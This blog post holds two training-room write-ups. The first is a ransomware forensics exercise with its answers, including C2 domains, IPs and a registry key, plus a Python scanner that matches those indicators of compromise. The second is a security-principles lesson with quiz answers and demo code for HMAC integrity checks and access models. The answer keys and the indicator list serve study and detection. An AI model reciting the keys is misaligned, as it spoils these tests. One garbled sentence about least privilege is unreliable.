    The firewall alerted the Security Operations Center that one of the machines at the Sales department, which stores all the customers' data, contacted the malicious domains over the network. When the Security Analysts looked closely, the data sent to the domains contained suspicious base64-encoded strings. The Analysts involved the Incident Response team in pulling the Process Monitor and network traffic data to determine if the host is infected. But once they got on the machine, they knew it was a ransomware attack by looking at the wallpaper and reading the ransomware note.


    I placed the logfile into the procmon as in the figure below.


    It didn't seem to work, so I added the traffic file to Windump.


    1) Provide the two PIDs spawned from the malicious executable. (In the order as they appear in the analysis tool)

     

     


    Ans- 8644, 7128

     




    2) Provide the full path where the ransomware initially got executed? (Include the full path in your answer)

     

     


    We can see that the red box is the full path where the malware is initially executed, which is the second question.

    (The path is redacted for the learning purposes of each user.)

     


     


    Ans- c:\users\sales\appdata\local\temp\exploreer.exe




     

    3) This ransomware transfers the information about the compromised system and the encryption results to two domains over HTTP POST. What are the two C2 domains? (no space in the answer)

     

     

    After reading the third question, I looked into the first exploreer.exe found. I found a suspicious site that might be used by the “hackers”.
     
     

    On the second exploreer.exe, I also found one.




    Ans- mojobiden.com,paymenthacks.com



    4) What are the IPs of the malicious domains? (no space in the answer)
     

    Ans- 146.112.61.108,206.188.197.206





    5) Provide the user-agent used to transfer the encrypted data to the C2 channel.

     

    This question asks us to identify the user-agent used to transfer the encrypted data to the C2 channel.

    So, by right-clicking the site we found previously, we click on "Follow TCP Stream".

     

     


    Ans- Firefox/89.0










    6) Provide the cloud security service that blocked the malicious domain.

     

     


    Now, we need to identify the cloud security service that blocked the malicious domain.

    So, in the same window, scroll down a bit more, and we can see the server name.

     

    Ans- Cisco Umbrella







    7) Provide the name of the bitmap that the ransomware set up as a desktop wallpaper.

     


    Ans- ley9kpi9r.bmp







    8) Find the PID (Process ID) of the process which attempted to change the background wallpaper on the victim's machine.

     

     

     


    Ans- 4892







    9) The ransomware mounted a drive and assigned it the letter. Provide the registry key path to the mounted drive, including the drive letter.

     

    For this part, we need to find the registry key path to the mounted drive, with the drive letter. So, I started with exploreer.exe. I looked into each process in detail but failed to find the path.

    This really cost me so much time. I was looking into the registry process and back to exploreer.exe without realizing that I had not turned off the "no path" option. I wasted about an hour until I realized it. So, after an hour in a rabbit hole, I managed to find the path.

     

     


    Ans- HKLM\SYSTEM\MountedDevices\DosDevices\Z:




    10) Now you have collected some IOCs from this investigation. Provide the name of the ransomware used in the attack. (external research required)

     

    This also took me a lot of time to research. I had no idea what keyword I should use to search for it.

    I tried searching for "ransomware targeting mount drive" and other phrases, which didn't help at all. But suddenly I thought about the sites the "hacker" used before. So, I tried one of the websites and looked it up on Google. And BAM! I got it!

     

    Ans- Blackmatter Ransomware
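    The IOCs gathered above (the two domains, their IPs, the dropped file path, the wallpaper name and the registry key) are what a defender would turn into detections. The Python below is an added example, not part of the writeup: it matches those values against constructed log lines, treats the user-agent as a weak indicator only (Firefox/89.0 is a legitimate browser string and must never alert on its own), and adds a typosquat check that flags a process image whose name is one or two edits away from a Windows system binary such as explorer.exe. The log lines and the SYSTEM_BINARIES list are constructed assumptions for the demonstration.

```python
"""Scan log lines for the IOCs collected in the Dunkle Materie investigation.

Added example, not part of the writeup. The IOC values come from the answers
above; the log lines are constructed for the demonstration and are not
captures from the room. Firefox/89.0 is a legitimate browser user-agent, so
it is only reported as a weak indicator and never produces an alert by itself.
"""
import re

IOCS = {
    "domain": ["mojobiden.com", "paymenthacks.com"],
    "ip": ["146.112.61.108", "206.188.197.206"],
    "path": [r"c:\users\sales\appdata\local\temp\exploreer.exe"],
    "wallpaper": ["ley9kpi9r.bmp"],
    "registry": [r"HKLM\SYSTEM\MountedDevices\DosDevices\Z:"],
}
WEAK_IOCS = {"user_agent": ["Firefox/89.0"]}

# Constructed allowlist of legitimate Windows binary names that malware imitates.
SYSTEM_BINARIES = ["explorer.exe", "svchost.exe", "lsass.exe", "csrss.exe"]

# Constructed sample log lines (proxy, Sysmon-style process creation, registry, file).
SAMPLE_LOGS = [
    "2021-09-01 10:02:11 proxy POST http://mojobiden.com/ src=10.0.5.21 dst=146.112.61.108 ua=Mozilla/5.0 Firefox/89.0",
    "2021-09-01 10:02:15 proxy POST http://paymenthacks.com/ src=10.0.5.21 dst=206.188.197.206 ua=Mozilla/5.0 Firefox/89.0",
    r"2021-09-01 10:01:58 sysmon ProcessCreate Image=C:\Users\sales\AppData\Local\Temp\exploreer.exe PID=8644",
    r"2021-09-01 10:03:40 sysmon RegistrySet Key=HKLM\SYSTEM\MountedDevices\DosDevices\Z: PID=8644",
    r"2021-09-01 10:04:02 sysmon FileCreate Target=C:\Users\sales\Desktop\ley9kpi9r.bmp PID=4892",
    "2021-09-01 10:05:00 proxy GET https://www.mozilla.org/ src=10.0.5.30 dst=203.0.113.10 ua=Mozilla/5.0 Firefox/89.0",
    r"2021-09-01 10:06:00 sysmon ProcessCreate Image=C:\Windows\explorer.exe PID=1200",
]


def edit_distance(a, b):
    """Levenshtein distance, used to spot typosquatted binary names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_of(image_path):
    """Return the system binary an image name imitates, or None if it is exact or unrelated."""
    name = image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name in SYSTEM_BINARIES:
        return None
    for legit in SYSTEM_BINARIES:
        if edit_distance(name, legit) <= 2:
            return legit
    return None


def scan_line(line):
    """Return (strong_hits, weak_hits) for one log line; matching is case-insensitive."""
    low = line.lower()
    strong = [(kind, ioc) for kind, iocs in IOCS.items() for ioc in iocs if ioc.lower() in low]
    weak = [(kind, ioc) for kind, iocs in WEAK_IOCS.items() for ioc in iocs if ioc.lower() in low]
    m = re.search(r"Image=(\S+)", line)
    if m:
        legit = typosquat_of(m.group(1))
        if legit:
            strong.append(("typosquat", f"{m.group(1)} imitates {legit}"))
    return strong, weak


def scan(lines):
    """Return (index, strong, weak) for lines with at least one strong IOC.
    Lines carrying only weak indicators are not alerts."""
    alerts = []
    for idx, line in enumerate(lines):
        strong, weak = scan_line(line)
        if strong:
            alerts.append((idx, strong, weak))
    return alerts


if __name__ == "__main__":
    for idx, strong, weak in scan(SAMPLE_LOGS):
        print(f"line {idx}: strong={strong} weak={weak}")
```

    On the constructed sample, lines 0 to 4 alert (domain, IP, dropped path plus typosquat, registry key, wallpaper) while line 5, a benign browser request carrying the same user-agent, and line 6, the real explorer.exe, do not.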







  • Know About Principles Of Security

    Know About Principles Of Security


    The following blog is going to outline some of the fundamental principles of information security, from the frameworks used to protect data and systems to the elements of what exactly makes data secure.

    The measures, frameworks and protocols discussed throughout this room all play a small part in "Defence in Depth."

    Defence in Depth is the use of multiple varied layers of security to an organisation's systems and data in the hopes that multiple layers will provide redundancy in an organisation's security perimeter.





    The CIA Triad


    The CIA triad is an information security model that is kept in mind throughout the creation of a security policy. This model has an extensive background, with documented use dating back to 1998.


    This history is because the security of information (information security) does not start and/or end with cybersecurity, but instead, applies to scenarios like filing, record storage, etc.


    Consisting of three sections: Confidentiality, Integrity and Availability (CIA), this model has quickly become an industry standard today. This model should help determine the value of data that it applies to, and in turn, the attention it needs from the business.





    The CIA triad is unlike a traditional model where you have individual sections; instead, it is a continuous cycle. Whilst the three elements to the CIA triad can arguably overlap, if even just one element is not met, then the other two are rendered useless (similar to the fire triangle). If a security policy does not answer these three sections, it is seldom an effective security policy.


    Whilst the three elements to the CIA triad are arguably self-explanatory, let's explore these and contextualise them into cybersecurity.




    Confidentiality


    This element is the protection of data from unauthorized access and misuse. Organisations will always have some form of sensitive data stored on their systems. To provide confidentiality is to protect this data from parties that it is not intended for.


    There are many real-world examples of this; for example, employee records and accounting documents will be considered sensitive. Confidentiality will be provided in the sense that only HR administrators will access employee records, where vetting and tight access controls are in place. Accounting records are less valuable (and therefore less sensitive), so less stringent access controls would be in place for these documents. Another example is governments using a sensitivity classification rating system (top secret, classified, unclassified).



    Integrity


    The CIA triad element of integrity is the condition where information is kept accurate and consistent unless authorized changes are made. It is possible for the information to change because of careless access and use, errors in the information system, or unauthorized access and use. In the CIA triad, integrity is maintained when the information remains unchanged during storage, transmission, and usage not involving modification to the information. Steps must be taken to ensure data cannot be altered by unauthorised people (for example, in a breach of confidentiality).


    Many defences to ensure integrity can be put in place. Access control and rigorous authentication can help prevent authorized users from making unauthorized changes. Hash verifications and digital signatures can help ensure that transactions are authentic and that files have not been modified or corrupted.
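    To make the hash-verification point concrete, here is an added example in Python (not from the original post): a record is protected once with a plain SHA-256 hash and once with an HMAC. Someone who can alter the record and also has write access to the stored hash can simply recompute the plain hash, so the unkeyed check passes; the keyed check fails because producing a valid HMAC requires the key. The record and key are constructed for the demonstration; a digital signature plays the same role where the verifier must not hold a shared secret.

```python
"""Integrity check of a record with a plain hash versus a keyed MAC.

Added example, not from the original post. A hash detects accidental
corruption, but anyone who can alter the data can recompute an unkeyed hash,
so authenticity needs a key (HMAC here) or a digital signature.
The record and key are constructed for the demonstration.
"""
import hashlib
import hmac

# Constructed sample: an accounting record and the secret held only by the
# issuing system and the verifier (in practice it comes from a secrets store).
RECORD = b"invoice=1042;amount=1500.00;payee=ACME Ltd"
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def sha256_hex(data: bytes) -> str:
    """Unkeyed digest of the data."""
    return hashlib.sha256(data).hexdigest()


def hmac_hex(key: bytes, data: bytes) -> str:
    """Keyed digest: cannot be recomputed without the key."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_hash(data: bytes, expected_hex: str) -> bool:
    """Detects corruption, but not deliberate tampering by someone who can
    also replace the stored hash."""
    return hmac.compare_digest(sha256_hex(data), expected_hex)


def verify_hmac(key: bytes, data: bytes, expected_hex: str) -> bool:
    """Tampering requires the key. compare_digest runs in constant time so the
    comparison does not leak how many leading characters matched."""
    return hmac.compare_digest(hmac_hex(key, data), expected_hex)


def tamper_scenario():
    """A modified amount checked by a verifier; returns three booleans:
    (plain hash passes, HMAC with a guessed key passes, HMAC left unchanged passes)."""
    tampered = RECORD.replace(b"1500.00", b"9500.00")
    stored_mac = hmac_hex(SERVER_KEY, RECORD)      # what the issuer stored
    replaced_hash = sha256_hex(tampered)           # recomputed by whoever altered the record
    guessed_mac = hmac_hex(b"guessed-key", tampered)  # forged without SERVER_KEY
    return (
        verify_hash(tampered, replaced_hash),           # True: no authenticity from a hash alone
        verify_hmac(SERVER_KEY, tampered, guessed_mac),  # False
        verify_hmac(SERVER_KEY, tampered, stored_mac),   # False: MAC no longer matches the data
    )


if __name__ == "__main__":
    print(tamper_scenario())  # (True, False, False)
```

    The same reasoning is why a checksum published on the same web server as a download only protects against transfer errors, whereas a signature (or a MAC shared with the verifier) protects against substitution.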





    Availability


    In order for data to be useful, it must be available and accessible by the user.

    The main concern in the CIA triad is that the information should be available when authorised users need to access it.

    Availability is very often a key benchmark for an organisation. For example, having 99.99% uptime on their websites or systems (this is laid out in Service Level Agreements). When a system is unavailable, it often results in damage to an organisation's reputation and loss of finances. Availability is achieved through a combination of many elements, including:

    • Having reliable and well-tested hardware for their information technology servers (i.e. reputable servers)
    • Having redundant technology and services in the case of failure of the primary
    • Implementing well-versed security protocols to protect technology and services from attack




    1) What element of the CIA triad ensures that data cannot be altered by unauthorised people?

    Ans - Integrity


    2) What element of the CIA triad ensures that data is available?

    Ans - Availability


    3) What element of the CIA triad ensures that data is only accessed by authorised people?

    Ans - confidentiality


     

    Principles of Privileges


    It is vital to administrate and correctly define the various levels of access to an information technology system individuals require.


    The levels of access given to individuals are determined on two primary factors:


    • The individual's role/function within the organisation
    • The sensitivity of the information being stored on the system





    To assign and manage the access rights of individuals, two key concepts are used: Privileged Identity Management (PIM) and Privileged Access Management (or PAM for short).


    Initially, these two concepts can seem to overlap; however, they are different from one another. PIM is used to translate a user's role within an organisation into an access role on a system. Whereas PAM is the management of the privileges a system's access role has, amongst other things.


    What is essential when discussing privilege and access controls is the principle of least privilege. Simply, users should be given the minimum amount of privileges, and only those that are absolutely necessary for them to perform their duties. Other people should be able to trust what people write to.


    As we previously mentioned, PAM incorporates more than assigning access. It also encompasses enforcing security policies such as password management, auditing policies and reducing the attack surface a system faces.







    1) What does the acronym "PIM" stand for?

    Ans- Privileged identity management



    2) What does the acronym "PAM" stand for?

    Ans - Privileged Access Management



    3) If you wanted to manage the privileges a system access role had, what methodology would you use?

    Ans - PAM


    4) If you wanted to create a system role that is based on a users role/responsibilities with an organisation, what methodology is this?

    Ans - PIM





    Security Models Continued


    Before discussing security models further, let's recall the three elements of the CIA triad: Confidentiality, Integrity and Availability. We've previously outlined what these elements are and their importance. However, there is a formal way of achieving this.


    According to a security model, any system or piece of technology storing information is called an information system, which is how we will reference systems and devices in this task.


    Let's explore some popular and effective security models used to achieve the three elements of the CIA triad.





    The Bell-La Padula Model


    The Bell-La Padula Model is used to achieve confidentiality. This model has a few assumptions, such as a hierarchical structure in the organisation it is used in, where everyone's responsibilities/roles are well-defined.


    The model works by granting access to pieces of data (called objects) on a strictly need-to-know basis. This model uses the rule "no write down, no read up".


     

    Advantages:
    • Policies in this model can be replicated to real-life organisations' hierarchies (and vice versa).
    • Simple to implement and understand, and it has been proven to be successful.

    Disadvantages:
    • Even though a user may not have access to an object, they will know about its existence, so it is not confidential in that aspect.
    • The model relies on a large amount of trust within the organisation.

     




    The Bell-La Padula Model is popular within organisations such as governmental and military ones. This is because members of these organisations are presumed to have already gone through a process called vetting. Vetting is a screening process where applicants' backgrounds are examined to establish the risk they pose to the organisation. Therefore, applicants who are successfully vetted are assumed to be trustworthy, which is where this model fits in.



    Biba Model


    The Biba model is arguably the equivalent of the Bell-La Padula model but for the integrity of the CIA triad.


    This model applies the rule to objects (data) and subjects (users) that can be summarised as "no write up, no read down". This rule means that subjects can create or write content to objects at or below their level but can only read the contents of objects above the subject's level.


    Let's compare some advantages and disadvantages of this model in the table below:



     

    Advantages:
    • This model is simple to implement.
    • Resolves the limitations of the Bell-La Padula model by addressing both confidentiality and data integrity.

    Disadvantages:
    • There will be many levels of access and objects. Things can be easily overlooked when applying security controls.
    • Often results in delays within a business. For example, a doctor would not be able to read the notes made by a nurse in a hospital with this model.

     



    The Biba model is used in organisations or situations where integrity is more important than confidentiality. For example, in software development, developers may only have access to the code that is necessary for their job. They may not need access to critical pieces of information such as databases, etc.
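    As an added example, not code from the original post, the Python below encodes both rules as a reference-monitor check and runs the hospital and military scenarios described above through it. The level ordering and the requests are constructed; in the standard formulation of both models a subject may also read and write at its own level, which the code permits.

```python
"""Access decisions under Bell-LaPadula (confidentiality) and Biba (integrity).

Added example; not code from the original post. The levels below form a
constructed ordering Unclassified < Confidential < Secret < Top Secret; for
Biba the same numbers are read as integrity levels (higher = more trusted).
Both models compare the subject's level with the object's level:
  Bell-LaPadula: no read up, no write down
  Biba:          no read down, no write up
Access at the subject's own level is permitted by both (standard formulation).
"""
from enum import IntEnum


class Level(IntEnum):
    UNCLASSIFIED = 0
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


def blp_allows(subject: Level, obj: Level, op: str) -> bool:
    """Bell-LaPadula: simple security property (read) and *-property (write)."""
    if op == "read":
        return subject >= obj   # may read at or below own clearance (no read up)
    if op == "write":
        return subject <= obj   # may write at or above own clearance (no write down)
    raise ValueError(f"unknown operation {op!r}")


def biba_allows(subject: Level, obj: Level, op: str) -> bool:
    """Biba: simple integrity axiom (read) and *-integrity axiom (write)."""
    if op == "read":
        return subject <= obj   # may read at or above own integrity (no read down)
    if op == "write":
        return subject >= obj   # may write at or below own integrity (no write up)
    raise ValueError(f"unknown operation {op!r}")


def evaluate(policy, requests):
    """Run (subject, subject_level, object, object_level, op) requests through a
    policy function and return the denied ones, as an access audit log would."""
    denied = []
    for who, s_lvl, what, o_lvl, op in requests:
        if not policy(s_lvl, o_lvl, op):
            denied.append(f"{who} {op} {what}")
    return denied


# Constructed requests illustrating the text's examples.
HOSPITAL = [
    ("doctor", Level.SECRET, "nurse_notes", Level.CONFIDENTIAL, "read"),    # Biba: denied (read down)
    ("nurse", Level.CONFIDENTIAL, "doctor_orders", Level.SECRET, "read"),   # Biba: allowed (read up)
    ("nurse", Level.CONFIDENTIAL, "doctor_orders", Level.SECRET, "write"),  # Biba: denied (write up)
]
MILITARY = [
    ("analyst", Level.SECRET, "ops_plan", Level.TOP_SECRET, "read"),        # BLP: denied (read up)
    ("analyst", Level.SECRET, "ops_plan", Level.TOP_SECRET, "write"),       # BLP: allowed (write up)
    ("analyst", Level.SECRET, "public_site", Level.UNCLASSIFIED, "write"),  # BLP: denied (write down)
]

if __name__ == "__main__":
    print("Biba denies:", evaluate(biba_allows, HOSPITAL))
    print("BLP denies: ", evaluate(blp_allows, MILITARY))
```

    Note the mirror image: the doctor's denied read under Biba is exactly the kind of access Bell-LaPadula would allow, which is why the two models are paired with integrity and confidentiality respectively and why real systems rarely enforce both literally.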





    1) What is the name of the model that uses the rule "can't read up, can read down"?

    Ans - The Bell-La Padula Model



    2) What is the name of the model that uses the rule "can read up, can't read down"?

    Ans - the biba model



    3) If you were a military, what security model would you use?

    Ans - The Bell-La Padula Model



    4) If you were a software developer, what security model would the company perhaps use?

    Ans - the biba model





    Threat Modelling & Incident Response


    Threat modelling is the process of reviewing, improving, and testing the security protocols in place in an organisation's information technology infrastructure and services.


    A critical stage of the threat modelling process is identifying the likely threats that an application or system may face and the vulnerabilities it may be exposed to.

     







    The threat modelling process is very similar to a risk assessment made in workplaces for employees and customers. The principles all return to:




    • Preparation
    • Identification
    • Mitigations
    • Review





    It is, however, a complex process that needs constant review and discussion with a dedicated team. An effective threat model includes:


    • Threat intelligence
    • Asset identification
    • Mitigation capabilities
    • Risk assessment




    To help with this, there are frameworks such as STRIDE (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of Service and Elevation of privileges) and PASTA (Process for Attack Simulation and Threat Analysis); infosec never tasted so good! Let's detail STRIDE below. STRIDE, authored by two Microsoft security researchers in 1999, is still very relevant today. STRIDE includes six main principles, which I have detailed in the table below:






     

    Principle and description:

    • Spoofing: This principle requires you to authenticate requests and users accessing a system. Spoofing involves a malicious party falsely identifying itself as another. Access keys (such as API keys) or signatures via encryption help remediate this threat.
    • Tampering: By providing anti-tampering measures to a system or application, you help provide integrity to the data. Data that is accessed must be kept integral and accurate. For example, shops use seals on food products.
    • Repudiation: This principle dictates the use of services such as logging of activity for a system or application to track.
    • Information Disclosure: Applications or services that handle information of multiple users need to be appropriately configured so that only information relevant to the owner is shown.
    • Denial of Service: Applications and services use up system resources, so they should have measures in place so that abuse of the application/service won't result in bringing the whole system down.
    • Elevation of Privilege: This is the worst-case scenario for an application or service. It means that a user was able to escalate their authorization to that of a higher level, i.e. an administrator. This scenario often leads to further exploitation or information disclosure.

     



    A breach of security is known as an incident. And despite all rigorous threat models and secure system designs, incidents do happen. Actions taken to resolve and remediate the threat are known as Incident Response (IR) and are a whole career path in cybersecurity.


    Incidents are classified using a rating of urgency and impact. Urgency will be determined by the type of attack faced, where the impact will be determined by the affected system and what impact that has on business operations.

     







    An incident is responded to by a Computer Security Incident Response Team (CSIRT), which is a prearranged group of employees with technical knowledge about the systems and/or the current incident. The steps taken to successfully resolve an incident are often referred to as the six phases of Incident Response, listed in the table below:



     

    Action and description:

    • Preparation: Do we have the resources and plans in place to deal with the security incident?
    • Identification: Have the threat and the threat actor been correctly identified in order for us to respond?
    • Containment: Can the threat/security incident be contained to prevent other systems or users from being impacted?
    • Eradication: Remove the active threat.
    • Recovery: Perform a full review of the impacted systems to return to business-as-usual operations.
    • Lessons Learned: What can be learnt from the incident? I.e. if it was due to a phishing email, employees should be trained better to detect phishing emails.

     




    1) What model outlines "Spoofing"?

    Ans - STRIDE



    2) What does the acronym "IR" stand for?

    Ans - incident response



    3) You are tasked with adding some measures to an application to improve the integrity of data, what STRIDE principle is this?

    Ans - Tampering



    4) An attacker has penetrated your organisation's security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?

    Ans - Recovery







     
